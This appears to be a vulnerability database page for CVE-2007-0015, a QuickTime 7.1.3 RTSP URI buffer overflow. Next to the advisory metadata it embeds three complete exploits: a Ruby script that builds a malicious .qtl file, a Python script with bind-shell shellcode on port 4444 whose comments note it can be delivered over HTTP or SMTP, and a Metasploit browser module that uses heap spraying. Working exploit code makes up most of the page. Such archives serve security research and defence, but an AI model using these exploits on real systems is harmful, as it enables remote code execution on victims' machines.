CVE-2007-0015 : Detail

CVE-2007-0015

89.61%V3
Network
2007-01-01 22h00 +00:00
2017-10-18 12h57 +00:00

CVE Descriptions

Buffer overflow in Apple QuickTime 7.1.3 allows remote attackers to execute arbitrary code via a long rtsp:// URI.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector                | Source
V2      | 6.8   |          | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 3064

Publication date : 2006-12-31 23h00 +00:00
Author : MoAB
EDB Verified : Yes

#!/usr/bin/ruby
# Copyright (c) LMH <lmh [at] info-pull.com>
#               Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Notes:
# Our command string is loaded on memory at a static address normally,
# but this depends on execution method and the string length. The address set in this exploit will
# be likely successful if we open the resulting QTL file directly, without having an
# instance of Quicktime running. Although, when using another method and string, you'll need
# to find the address.
# For 100% reliable exploitation you can always use the /bin/sh address,
# but that's not as cool as having your box welcoming the new year.
# Do whatever you prefer. That said, enjoy.
#
# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html

# Command string: Use whatever you like.
# Remember that changing this will also need a change of the target address for system(),
# unless string length is the same.
CMD_STRING = "/usr/bin/say Happy new year shit bag"

# Mac OS X 10.4.8 (8L2127)
EBP_ADDR    = 0xdeadbabe
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
SETUID_ADDR = 0x900334f0
CURL_ADDR   = 0x916c24bc # /usr/bin/curl
SHELL_ADDR  = 0x918bef3a # /bin/sh

CMDSTR_ADDR = [
  SHELL_ADDR, # 0 addr to static /bin/sh (lame)
  0x17a053c,  # 1 addr to our command string (cool) :> (change as necessary)
  0xbabeface, # 2 bogus addr for testing.
  CURL_ADDR   # 3 addr to '/usr/bin/curl'
]

# Payload
HAPPY = ("A" * 299) + [EBP_ADDR].pack("V") + [SYSTEM_ADDR].pack("V") +
        [SETUID_ADDR].pack("V") + [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr

# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
# although, for using our own fu, we need to spray some data for better reliability
# the goal is causing allocation of large heap chunks
NEW   = ("\x90" * 30000) + CMD_STRING # feed the heap
YEAR  = ("\x90" * 30000) + CMD_STRING # go johnny, go
APPLE = ("\x90" * 30000) + "EOOM"     # feed the heap more
BOYZ  = ("\x90" * 30000) + "FOOM"     # and more

# QTL output template
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
  "<?quicktime type=\"application/x-quicktime-media-link\"?>" +
  "<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
  "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
  "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"

target_file = File.open("pwnage.qtl", "w+") { |f|
  f.print(QTL_CONTENT)
  f.close
}

# milw0rm.com [2007-01-01]
Exploit Database EDB-ID : 3072

Publication date : 2007-01-02 23h00 +00:00
Author : Winny Thomas
EDB Verified : Yes

#!/usr/bin/python
#Port bind exploit for apple quicktime rtsp vulnerability
#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy
#to port the exploit to others. All one needs to do is look for the appropriate
#jump address. Certain characters are not permitted in the shellcode.
#Alphanumeric shellcodes work fine.
#This script creates a qtl file which when clicked upon binds a shell to TCP
#port 4444. This file can be delivered through several means; HTTP, SMTP etc
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any kind of screws up caused by using
# this code

import sys

#alpha numeric port bind shellcode from metasploit; binds shell to port 4444
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
shellcode += "\x90" * 90

def CreateQTL(sp):
    if sp == "1":
        JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll
    elif sp == "2":
        JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll
    else:
        print 'Unsupported Service pack number'
        sys.exit(-1)

    #XML template from http://www.milw0rm.org/exploits/3064
    QTL = "<?xml version=\"1.0\"?>"
    QTL += "<?quicktime type=\"application/x-quicktime-media-link\"?>"
    QTL += "<embed autoplay=\"true\" moviename=\"#{NEW}\" "
    QTL += "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" "
    QTL += "src=\"rtsp://" + '\x90'*200 + shellcode + '\x90'*9000 + ':' + '\x90'*811 + JMPedi
    QTL += "\" />\n"

    fd = open('./exp.qtl', 'w')
    fd.write(QTL)
    fd.close()

if __name__ == '__main__':
    try:
        sp = sys.argv[1]
    except IndexError:
        print 'Usage: %s <version number>\n' % sys.argv[0]
        print 'Version: 1 => windows 2000 server SP0'
        print 'Version: 2 => windows 2000 server SP4'
        sys.exit(-1)
    CreateQTL(sp)

# milw0rm.com [2007-01-03]
Exploit Database EDB-ID : 16527

Publication date : 2010-05-03 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: apple_quicktime_rtsp.rb 9220 2010-05-04 23:09:32Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :os_name    => OperatingSystems::WINDOWS,
    :javascript => true,
    :rank       => NormalRanking, # reliable memory corruption
    :vuln_test  => nil,
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Apple QuickTime
        7.1.3. This module was inspired by MOAB-01-01-2007. The Browser
        target for this module was tested against IE 6 and Firefox 1.5.0.3
        on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin.
      },
      'Author'         => [ 'MC', 'egypt' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9220 $',
      'References'     =>
        [
          [ 'CVE', '2007-0015' ],
          [ 'OSVDB', '31023'],
          [ 'BID', '21829' ],
          [ 'URL', 'http://projects.info-pull.com/moab/MOAB-01-01-2007.html' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Apple QuickTime Player 7.1.3',
            {
              'Ret' => 0x6855d8a2 # xpsp2/2k3 :( | vista ;)
            }
          ],
          [ 'Browser Universal',
            {
              'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jan 1 2007',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(client, request)
    return if ((p = regenerate_payload(client)) == nil)

    if (target.name =~ /Automatic/)
      if (request['User-Agent'] =~ /QuickTime/i)
        target = targets[1]
      else
        target = targets[2]
      end
    end

    cruft = rand_text_alphanumeric(4)

    # This is all basically filler on the browser target because we can't
    # expect the SEH to be in a reliable place across multiple browsers.
    # Heap spray ftw.
    sploit = rand_text_english(307)
    sploit << p.encoded + "\xeb\x06" + rand_text_english(2)
    sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')

    if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
      print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")
      print_status("Trying target #{target.name}...")
      content = build_qtl(sploit)
    else
      print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")
      shellcode = Rex::Text.to_unescape(p.encoded)
      url = ((datastore['SSL']) ? "https://" : "http://")
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
      url << ":" + datastore['SRVPORT']
      url << get_resource
      js = <<-ENDJS
        #{js_heap_spray}
        sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);
      ENDJS
      content = "<html><body><script><!--\n#{js}//--></script>"
      content << <<-ENDEMBED
<OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{cruft}.qtl">
<PARAM name="QTSRC" VALUE = "#{url}/#{cruft}.qtl">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED SRC = "#{url}/#{cruft}.qtl" QTSRC = "#{url}/#{cruft}.qtl" TARGET = "myself" WIDTH = "1" HEIGHT = "1" AUTOPLAY = "true" PLUGIN = "quicktimeplugin" TYPE = "video/quicktime" CACHE = "false" PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
      ENDEMBED
      content << "</body></html>"
    end

    send_response(client, content, { 'Content-Type' => "text/html" })

    # Handle the payload
    handler(client)
  end

  def build_qtl(overflow)
    cruft = rand_text_english(4)

    content = "<?xml version=\"1.0\"?>\n"
    content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n"
    content << "<embed autoplay=\"true\" \n"
    content << "moviename=\"#{cruft}\" \n"
    content << "qtnext=\"#{cruft}\" \n"
    content << "type=\"video/quicktime\" \n"
    content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n"
  end
end

Products Mentioned

Configuration 0

Apple >> Quicktime >> Version 7.1.3

References

http://www.kb.cert.org/vuls/id/442497
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.osvdb.org/31023
Tags : vdb-entry, x_refsource_OSVDB
http://www.us-cert.gov/cas/techalerts/TA07-005A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/blog/7/
Tags : x_refsource_MISC
http://secunia.com/advisories/23540
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/21829
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/3064
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2007/0001
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1017461
Tags : vdb-entry, x_refsource_SECTRACK